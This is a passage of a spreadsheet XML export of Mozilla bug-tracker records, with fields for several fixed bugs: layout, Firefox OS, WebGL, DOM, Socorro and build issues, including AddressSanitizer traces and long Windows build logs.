      <c r="P6344" t="inlineStr"/>
      <c r="Q6344" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6344" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6344" t="inlineStr">
        <is>
          <t>mozilla0.9.6</t>
        </is>
      </c>
      <c r="T6344" t="n">
        <v>1</v>
      </c>
      <c r="U6344" t="n">
        <v>0</v>
      </c>
      <c r="V6344" t="n">
        <v>75</v>
      </c>
      <c r="W6344" t="inlineStr">
        <is>
          <t>We currently recover vertical margin state in an incremental reflow in a very
inefficient way -- we walk the whole list of frames and keep clobbering the
margin everytime one of the frames has nonempty contents.  Not only does the
current stuff often give the wrong answer (see all the [MARGIN-C] bugs) but it's
slow.
I think the solution to this should be roughly the following:
 * make the line list doubly linked (perhaps with XOR?)
 * rewrite collapsing margin code to fix at least some of the [MARGIN-C] bugs
and recover the vertical margins by walking backwards</t>
        </is>
      </c>
      <c r="X6344" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6345">
      <c r="A6345" t="n">
        <v>1220450</v>
      </c>
      <c r="B6345" t="inlineStr">
        <is>
          <t>2015-11-01 01:58:48 -0700</t>
        </is>
      </c>
      <c r="C6345" t="inlineStr">
        <is>
          <t>global-buffer-overflow (write) at BufferSubData</t>
        </is>
      </c>
      <c r="D6345" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:47 -0700</t>
        </is>
      </c>
      <c r="E6345" t="n">
        <v>1</v>
      </c>
      <c r="F6345" t="n">
        <v>1</v>
      </c>
      <c r="G6345" t="n">
        <v>3</v>
      </c>
      <c r="H6345" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6345" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6345" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K6345" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6345" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6345" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6345" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6345" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6345" t="inlineStr">
        <is>
          <t>[adv-main44+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q6345" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6345" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6345" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T6345" t="n">
        <v>1</v>
      </c>
      <c r="U6345" t="n">
        <v>0</v>
      </c>
      <c r="V6345" t="n">
        <v>51</v>
      </c>
      <c r="W6345" t="inlineStr">
        <is>
          <t>Created attachment 8681678
ff-bofw-glbounds.html
The attached page triggers a global buffer overflow write. This happens every time at least on a freshly installed Debian machine using a recent tindebox build. Not tested on other machines or display drivers yet.
==4966==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fc0d209890f at pc 0x7fc0c8efdd95 bp 0x7fff3db96cb0 sp 0x7fff3db96ca8
WRITE of size 31337 at 0x7fc0d209890f thread T0 (Web Content)
    #0 0x7fc0c8efdd94 in BufferSubData /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/canvas/WebGLElementArrayCache.cpp:492
    #1 0x7fc0c8efdd94 in ?? ??:0
    #2 0x7fc0c8e73e45 in BufferSubDataT&lt;mozilla::dom::ArrayBufferView_base&lt;&amp;js::UnwrapArrayBufferView, &amp;js::GetArrayBufferViewLengthAndData, &amp;JS_GetArrayBufferViewType&gt; &gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/canvas/WebGLContextBuffers.cpp:313
    #3 0x7fc0c8e73e45 in ?? ??:0
    #4 0x7fc0c840d310 in bufferSubData /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./WebGLRenderingContextBinding.cpp:10849
    #5 0x7fc0c840d310 in ?? ??:0
    #6 0x7fc0c8d2e637 in GenericBindingMethod /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/bindings/BindingUtils.cpp:2691
    #7 0x7fc0c8d2e637 in ?? ??:0
    #8 0x7fc0ce3694db in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #9 0x7fc0ce3694db in Invoke /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:772
    #10 0x7fc0ce3694db in ?? ??:0
   [...]</t>
        </is>
      </c>
      <c r="X6345" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6346">
      <c r="A6346" t="n">
        <v>799482</v>
      </c>
      <c r="B6346" t="inlineStr">
        <is>
          <t>2012-10-09 06:58:59 -0700</t>
        </is>
      </c>
      <c r="C6346" t="inlineStr">
        <is>
          <t>[OTA update] No way of resuming after app crashes</t>
        </is>
      </c>
      <c r="D6346" t="inlineStr">
        <is>
          <t>2012-12-15 13:12:28 -0800</t>
        </is>
      </c>
      <c r="E6346" t="n">
        <v>1</v>
      </c>
      <c r="F6346" t="n">
        <v>1</v>
      </c>
      <c r="G6346" t="n">
        <v>6</v>
      </c>
      <c r="H6346" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6346" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6346" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6346" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6346" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6346" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6346" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6346" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6346" t="inlineStr">
        <is>
          <t>[ota update]</t>
        </is>
      </c>
      <c r="Q6346" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6346" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6346" t="inlineStr">
        <is>
          <t>B2G C2 (20nov-10dec)</t>
        </is>
      </c>
      <c r="T6346" t="n">
        <v>1</v>
      </c>
      <c r="U6346" t="n">
        <v>0</v>
      </c>
      <c r="V6346" t="n">
        <v>14</v>
      </c>
      <c r="W6346" t="inlineStr">
        <is>
          <t>Created attachment 669513
logcat
+++ This bug was initially created as a clone of Bug #791829 +++
Dupe me, if i'm bug 791829.  Started on a 10-08-2012 daily build.
This morning, i got an OTA update available to download on its own.   When prompted to download in the dialog, i tapped it but then the screen crashed.
After resuming from the crash, the updater dialog never came back.   
Attached a logcat of the event, but i didnt find anything useful.  Maybe someone else sees something? 
Steps to reproduce:
1. load the 2012-10-08us build onto an otoro phone
2. wait until OTA finds an update, and then look for the system notification indicating an update is available
3. proceed to download the update.  At this point, the screen crashes (i dont know how to reproduce this part)
4. upon screen recovery, verify no update notification resumes or ever prompts me again to download.
Expected:
- updater resumes in the background, or reprompted after a crash
Actual:
- crash kills the updater, never to be seen again.</t>
        </is>
      </c>
      <c r="X6346" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6347">
      <c r="A6347" t="n">
        <v>981178</v>
      </c>
      <c r="B6347" t="inlineStr">
        <is>
          <t>2014-03-07 16:04:48 -0800</t>
        </is>
      </c>
      <c r="C6347" t="inlineStr">
        <is>
          <t>Provide release note text for FxOS 1.3</t>
        </is>
      </c>
      <c r="D6347" t="inlineStr">
        <is>
          <t>2014-03-12 08:26:15 -0700</t>
        </is>
      </c>
      <c r="E6347" t="n">
        <v>1</v>
      </c>
      <c r="F6347" t="n">
        <v>1</v>
      </c>
      <c r="G6347" t="n">
        <v>5</v>
      </c>
      <c r="H6347" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6347" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J6347" t="inlineStr">
        <is>
          <t>Bedrock</t>
        </is>
      </c>
      <c r="K6347" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L6347" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6347" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6347" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6347" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6347" t="inlineStr"/>
      <c r="Q6347" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6347" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6347" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6347" t="n">
        <v>1</v>
      </c>
      <c r="U6347" t="n">
        <v>0</v>
      </c>
      <c r="V6347" t="n">
        <v>5</v>
      </c>
      <c r="W6347" t="inlineStr">
        <is>
          <t>As described in bug 981176, we will be coding the release notes page for FxOS release 1.3 by hand. We need text for that page. It should be formatted exactly like the text in the 1.2 release notes page:
http://www.mozilla.org/en-US/firefox/os/notes/1.2/
Specifically, it should include...
* all major content headings 
* each individual item to go under those content headings, exactly as they should appear (no further copy editing should be necessary)
* any links that should appear in those content items must be included
This bug is blocking creation of the release notes page. This bug should be completed by the end of the day on Wednesday 2014-03-12 in order to give engineers time to create and deploy the page.</t>
        </is>
      </c>
      <c r="X6347" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6348">
      <c r="A6348" t="n">
        <v>228156</v>
      </c>
      <c r="B6348" t="inlineStr">
        <is>
          <t>2003-12-11 04:43:30 -0800</t>
        </is>
      </c>
      <c r="C6348" t="inlineStr">
        <is>
          <t>RTL textareas containing text originated in HTML code are misaligned [Regression]</t>
        </is>
      </c>
      <c r="D6348" t="inlineStr">
        <is>
          <t>2008-07-31 02:41:28 -0700</t>
        </is>
      </c>
      <c r="E6348" t="n">
        <v>1</v>
      </c>
      <c r="F6348" t="n">
        <v>1</v>
      </c>
      <c r="G6348" t="n">
        <v>3</v>
      </c>
      <c r="H6348" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6348" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6348" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K6348" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6348" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6348" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6348" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6348" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6348" t="inlineStr">
        <is>
          <t>[patch]</t>
        </is>
      </c>
      <c r="Q6348" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6348" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6348" t="inlineStr">
        <is>
          <t>mozilla1.6final</t>
        </is>
      </c>
      <c r="T6348" t="n">
        <v>1</v>
      </c>
      <c r="U6348" t="n">
        <v>0</v>
      </c>
      <c r="V6348" t="n">
        <v>29</v>
      </c>
      <c r="W6348" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6b) Gecko/20031208
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6b) Gecko/20031208
This is a serious regression that prevents previewing RTL messages in forums and
webmail.
Reproducible: Always
Steps to Reproduce:
Open http://bugzilla.mozilla.org/attachment.cgi?id=134102&amp;action=view or any
other page with an RTL textarea that already includes text.
Actual Results:  
The contained text does not align to the rightmost side of the textarea, but
rather starts at the middle (as if it was indented).
Expected Results:  
Text should be right-aligned.
Prog.</t>
        </is>
      </c>
      <c r="X6348" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6349">
      <c r="A6349" t="n">
        <v>392322</v>
      </c>
      <c r="B6349" t="inlineStr">
        <is>
          <t>2007-08-15 07:58:33 -0700</t>
        </is>
      </c>
      <c r="C6349" t="inlineStr">
        <is>
          <t>XMLHttpRequest crashes on local file retrieval [@ nsCrossSiteListenerProxy::OnStartRequest]</t>
        </is>
      </c>
      <c r="D6349" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6349" t="n">
        <v>1</v>
      </c>
      <c r="F6349" t="n">
        <v>1</v>
      </c>
      <c r="G6349" t="n">
        <v>3</v>
      </c>
      <c r="H6349" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6349" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6349" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6349" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6349" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6349" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6349" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6349" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6349" t="inlineStr"/>
      <c r="Q6349" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6349" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6349" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6349" t="n">
        <v>1</v>
      </c>
      <c r="U6349" t="n">
        <v>0</v>
      </c>
      <c r="V6349" t="n">
        <v>25</v>
      </c>
      <c r="W6349" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a7) Gecko/2007081419 Minefield/3.0a7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a7) Gecko/2007081419 Minefield/3.0a7
When getting a local file via XMLHttpRequest in a C++ component,  crashes in nsCrossSiteListenerProxy::OnStartRequest
with a NULL mRequestingURI
Reproducible: Always
Steps to Reproduce:
1. Request local file, say "resource:/config.xml" 
2. 
3.
Actual Results:  
crashes in nsCrossSiteListenerProxy::OnStartRequest
with a NULL mRequestingURI
Expected Results:  
config.xml is retrieved.</t>
        </is>
      </c>
      <c r="X6349" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6350">
      <c r="A6350" t="n">
        <v>1102379</v>
      </c>
      <c r="B6350" t="inlineStr">
        <is>
          <t>2014-11-20 10:31:42 -0800</t>
        </is>
      </c>
      <c r="C6350" t="inlineStr">
        <is>
          <t>middleware raises error when no crash found in S3</t>
        </is>
      </c>
      <c r="D6350" t="inlineStr">
        <is>
          <t>2014-11-21 10:57:17 -0800</t>
        </is>
      </c>
      <c r="E6350" t="n">
        <v>1</v>
      </c>
      <c r="F6350" t="n">
        <v>1</v>
      </c>
      <c r="G6350" t="n">
        <v>4</v>
      </c>
      <c r="H6350" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6350" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6350" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K6350" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6350" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6350" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6350" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6350" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6350" t="inlineStr"/>
      <c r="Q6350" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6350" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6350" t="inlineStr">
        <is>
          <t>111</t>
        </is>
      </c>
      <c r="T6350" t="n">
        <v>1</v>
      </c>
      <c r="U6350" t="n">
        <v>0</v>
      </c>
      <c r="V6350" t="n">
        <v>2</v>
      </c>
      <c r="W6350" t="inlineStr">
        <is>
          <t>https://errormill.mozilla.org/webtools/socorro-stage/group/174360/
AttributeError: 'NoneType' object has no attribute 'get_contents_as_string'
Stacktrace (most recent call last):
  File "socorro/middleware/middleware_app.py", line 588, in GET
    result = method(**params)
  File "socorro/external/crash_data_base.py", line 70, in get
    return get(params.uuid)
  File "socorro/external/boto/crashstorage.py", line 318, in get_unredacted_processed
    return self.transaction(self._do_get_unredacted_processed, crash_id)
  File "socorro/database/transaction_executor.py", line 104, in __call__
    result = function(connection, *args, **kwargs)
  File "socorro/external/boto/crashstorage.py", line 305, in _do_get_unredacted_processed
    "processed_crash"
  File "socorro/external/boto/crashstorage.py", line 364, in _fetch_from_boto_s3
    return storage_key.get_contents_as_string()</t>
        </is>
      </c>
      <c r="X6350" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6351">
      <c r="A6351" t="n">
        <v>1655371</v>
      </c>
      <c r="B6351" t="inlineStr">
        <is>
          <t>2020-07-26 18:32:46 -0700</t>
        </is>
      </c>
      <c r="C6351" t="inlineStr">
        <is>
          <t>Intermittent check&gt; z:\build\build\src\ipc\ipdl\test\ipdl\ok\Punion_Comparable.ipdl:9: error: Unknown sync IPC message Punion_Comparable::Msg</t>
        </is>
      </c>
      <c r="D6351" t="inlineStr">
        <is>
          <t>2020-08-05 02:28:23 -0700</t>
        </is>
      </c>
      <c r="E6351" t="n">
        <v>1</v>
      </c>
      <c r="F6351" t="n">
        <v>1</v>
      </c>
      <c r="G6351" t="n">
        <v>7</v>
      </c>
      <c r="H6351" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6351" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J6351" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6351" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6351" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6351" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6351" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6351" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6351" t="inlineStr"/>
      <c r="Q6351" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R6351" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6351" t="inlineStr">
        <is>
          <t>81 Branch</t>
        </is>
      </c>
      <c r="T6351" t="n">
        <v>1</v>
      </c>
      <c r="U6351" t="n">
        <v>0</v>
      </c>
      <c r="V6351" t="n">
        <v>9</v>
      </c>
      <c r="W6351" t="inlineStr">
        <is>
          <t>**Filed by:** apavel [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=311098832&amp;repo=mozilla-central
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/E0iyt4qVTN-_uRNpqoDjXg/runs/0/artifacts/public/logs/live_backing.log
---
[task 2020-07-27T00:01:00.661Z] 00:01:00     INFO -  check&gt; 9 | use crate::thread_parker::{ThreadParker, ThreadParkerT, UnparkHandleT};
[task 2020-07-27T00:01:00.661Z] 00:01:00     INFO -  check&gt;   |                                                         ^^^^^^^^^^^^^
[task 2020-07-27T00:01:00.661Z] 00:01:00     INFO -  check&gt;
[task 2020-07-27T00:01:00.661Z] 00:01:00     INFO -  check&gt;    Compiling parking_lot v0.10.2
[task 2020-07-27T00:01:00.661Z] 00:01:00     INFO -  check&gt;      Running `set CARGO='\\?\Z:\task_1595800870\fetches\rustc\bin\cargo.exe'&amp;&amp; set CARGO_MANIFEST_DIR='Z:\build\build\src\third_party\rust\parking_lot'&amp;&amp; set CARGO_PKG_AUTHORS='Amanieu d'\''Antras &lt;amanieu@gmail.com&gt;'&amp;&amp; set CARGO_PKG_DESCRIPTION='More compact and efficient implementations of the standard synchronization primitives.'&amp;&amp; set CARGO_PKG_HOMEPAGE=&amp;&amp; set CARGO_PKG_NAME=parking_lot&amp;&amp; set CARGO_PKG_REPOSITORY='https://github.com/Amanieu/parking_lot'&amp;&amp; set CARGO_PKG_VERSION=0.10.2&amp;&amp; set CARGO_PKG_VERSION_MAJOR=0&amp;&amp; set CARGO_PKG_VERSION_MINOR=10&amp;&amp; set CARGO_PKG_VERSION_PATCH=2&amp;&amp; set CARGO_PKG_VERSION_PRE=&amp;&amp; set PATH='z:/build/workspace/obj-build\release\deps;Z:\task_1595800870\fetches\rustc\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;c:\Program Files\Mercurial;c:\mozilla-build\bin;c:\mozilla-build\kdiff3;c:\mozilla-build\moztools-x64\bin;c:\mozilla-build\mozmake;C:\mozilla-build\msys\bin;C:\mozilla-build\msys\local\bin;c:\mozilla-build\nsis-3.01;c:\mozilla-build\python;c:\mozilla-build\python\Scripts;c:\mozilla-build\python3;c:\Windows\system32;c:\Windows;c:\Windows\System32\Wbem;c:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Amazon\cfn-bootstrap\;c:\Program Files (x86)\GNU\GnuPG\pub;c:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\;c:\mozilla-build\python\lib\site-packages\pywin32_system32;z:/build/build/src/vs2017_15.8.4/VC/bin/HostX64/x64;C:\Users\task_1595800870\.cargo\bin;z:\build\.mozbuild\clang\bin;z:\build\.mozbuild\cbindgen;z:\build\.mozbuild\dump_syms;z:\build\.mozbuild\nasm;z:\build\.mozbuild\lucetc'&amp;&amp; z:/build/fetches/sccache/sccache.exe 'z:/build/fetches/rustc/bin/rustc.exe' --crate-name parking_lot --edition=2018 'Z:\build\build\src\third_party\rust\parking_lot\src\lib.rs' --error-format=json --json=diagnostic-rendered-ansi,artifacts --crate-type lib --emit=dep-info,metadata,link -C opt-level=2 --cfg 'feature="default"' -C metadata=0546d067fa75cb20 -C extra-filename=-0546d067fa75cb20 --out-dir 'z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' --target x86_64-pc-windows-msvc -C 'linker=z:/build/build/src/build/cargo-linker.bat' -L 'dependency=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' -L 'dependency=z:/build/workspace/obj-build\release\deps' --extern 'lock_api=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\liblock_api-b4af0d870a31abf3.rmeta' --extern 'parking_lot_core=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libparking_lot_core-af64f7f01663229a.rmeta' --cap-lints warn -C opt-level=2 -C debuginfo=2 -C force-frame-pointers=yes --cap-lints warn -Ccodegen-units=1 -Zprofile -Cpanic=abort -Zpanic_abort_tests -Clink-dead-code -Coverflow-checks=off -C codegen-units=1`
[task 2020-07-27T00:01:07.017Z] 00:01:07     INFO -  check&gt;    Compiling to_shmem v0.0.1 (Z:\build\build\src\servo\components\to_shmem)
[task 2020-07-27T00:01:07.019Z] 00:01:07     INFO -  check&gt;      Running `set CARGO='\\?\Z:\task_1595800870\fetches\rustc\bin\cargo.exe'&amp;&amp; set CARGO_MANIFEST_DIR='Z:\build\build\src\servo\components\to_shmem'&amp;&amp; set CARGO_PKG_AUTHORS='The Servo Project Developers'&amp;&amp; set CARGO_PKG_DESCRIPTION=&amp;&amp; set CARGO_PKG_HOMEPAGE=&amp;&amp; set CARGO_PKG_NAME=to_shmem&amp;&amp; set CARGO_PKG_REPOSITORY=&amp;&amp; set CARGO_PKG_VERSION=0.0.1&amp;&amp; set CARGO_PKG_VERSION_MAJOR=0&amp;&amp; set CARGO_PKG_VERSION_MINOR=0&amp;&amp; set CARGO_PKG_VERSION_PATCH=1&amp;&amp; set CARGO_PKG_VERSION_PRE=&amp;&amp; set PATH='z:/build/workspace/obj-build\release\deps;Z:\task_1595800870\fetches\rustc\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;c:\Program Files\Mercurial;c:\mozilla-build\bin;c:\mozilla-build\kdiff3;c:\mozilla-build\moztools-x64\bin;c:\mozilla-build\mozmake;C:\mozilla-build\msys\bin;C:\mozilla-build\msys\local\bin;c:\mozilla-build\nsis-3.01;c:\mozilla-build\python;c:\mozilla-build\python\Scripts;c:\mozilla-build\python3;c:\Windows\system32;c:\Windows;c:\Windows\System32\Wbem;c:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Amazon\cfn-bootstrap\;c:\Program Files (x86)\GNU\GnuPG\pub;c:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\;c:\mozilla-build\python\lib\site-packages\pywin32_system32;z:/build/build/src/vs2017_15.8.4/VC/bin/HostX64/x64;C:\Users\task_1595800870\.cargo\bin;z:\build\.mozbuild\clang\bin;z:\build\.mozbuild\cbindgen;z:\build\.mozbuild\dump_syms;z:\build\.mozbuild\nasm;z:\build\.mozbuild\lucetc'&amp;&amp; z:/build/fetches/sccache/sccache.exe 'z:/build/fetches/rustc/bin/rustc.exe' --crate-name to_shmem 'servo\components\to_shmem\lib.rs' --error-format=json --json=diagnostic-rendered-ansi,artifacts --crate-type lib --emit=dep-info,metadata,link -C opt-level=2 -C metadata=ee44f57fa8af8fe2 -C extra-filename=-ee44f57fa8af8fe2 --out-dir 'z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' --target x86_64-pc-windows-msvc -C 'linker=z:/build/build/src/build/cargo-linker.bat' -L 'dependency=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' -L 'dependency=z:/build/workspace/obj-build\release\deps' --extern 'cssparser=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libcssparser-e5a73c462f3dfa42.rmeta' --extern 'servo_arc=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libservo_arc-05248f012d0ea28d.rmeta' --extern 'smallbitvec=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libsmallbitvec-eb1932ac477a63d6.rmeta' --extern 'smallvec=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libsmallvec-9ea8846c49949c33.rmeta' --extern 'thin_slice=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libthin_slice-cb8532dc7e7ab20d.rmeta' -C opt-level=2 -C debuginfo=2 -C force-frame-pointers=yes --cap-lints warn -Ccodegen-units=1 -Zprofile -Cpanic=abort -Zpanic_abort_tests -Clink-dead-code -Coverflow-checks=off -C codegen-units=1`
[task 2020-07-27T00:01:07.250Z] 00:01:07     INFO -  check&gt;      Running `set CARGO='\\?\Z:\task_1595800870\fetches\rustc\bin\cargo.exe'&amp;&amp; set CARGO_MANIFEST_DIR='Z:\build\build\src\servo\components\selectors'&amp;&amp; set CARGO_PKG_AUTHORS='The Servo Project Developers'&amp;&amp; set CARGO_PKG_DESCRIPTION='CSS Selectors matching for Rust'&amp;&amp; set CARGO_PKG_HOMEPAGE=&amp;&amp; set CARGO_PKG_NAME=selectors&amp;&amp; set CARGO_PKG_REPOSITORY='https://github.com/servo/servo'&amp;&amp; set CARGO_PKG_VERSION=0.22.0&amp;&amp; set CARGO_PKG_VERSION_MAJOR=0&amp;&amp; set CARGO_PKG_VERSION_MINOR=22&amp;&amp; set CARGO_PKG_VERSION_PATCH=0&amp;&amp; set CARGO_PKG_VERSION_PRE=&amp;&amp; set OUT_DIR='z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\build\selectors-82684e8ec6d6b72f\out'&amp;&amp; set PATH='z:/build/workspace/obj-build\release\deps;Z:\task_1595800870\fetches\rustc\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;c:\Program Files\Mercurial;c:\mozilla-build\bin;c:\mozilla-build\kdiff3;c:\mozilla-build\moztools-x64\bin;c:\mozilla-build\mozmake;C:\mozilla-build\msys\bin;C:\mozilla-build\msys\local\bin;c:\mozilla-build\nsis-3.01;c:\mozilla-build\python;c:\mozilla-build\python\Scripts;c:\mozilla-build\python3;c:\Windows\system32;c:\Windows;c:\Windows\System32\Wbem;c:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Amazon\cfn-bootstrap\;c:\Program Files (x86)\GNU\GnuPG\pub;c:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\;c:\mozilla-build\python\lib\site-packages\pywin32_system32;z:/build/build/src/vs2017_15.8.4/VC/bin/HostX64/x64;C:\Users\task_1595800870\.cargo\bin;z:\build\.mozbuild\clang\bin;z:\build\.mozbuild\cbindgen;z:\build\.mozbuild\dump_syms;z:\build\.mozbuild\nasm;z:\build\.mozbuild\lucetc'&amp;&amp; z:/build/fetches/sccache/sccache.exe 'z:/build/fetches/rustc/bin/rustc.exe' --crate-name selectors 'servo\components\selectors\lib.rs' --error-format=json --json=diagnostic-rendered-ansi,artifacts --crate-type lib --emit=dep-info,metadata,link -C opt-level=2 -C metadata=85bef444428b9538 -C 